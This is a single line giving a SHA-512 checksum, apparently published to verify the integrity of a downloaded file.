SHA5120f0a13e3ce6f0fec178eb6c82658e2b33fc69bd6aa4346ff4cbe7b1cd72ab47a08af8335c599833a49dacb0fa72f0bd944275763e807802a8aeb0a07da86dee6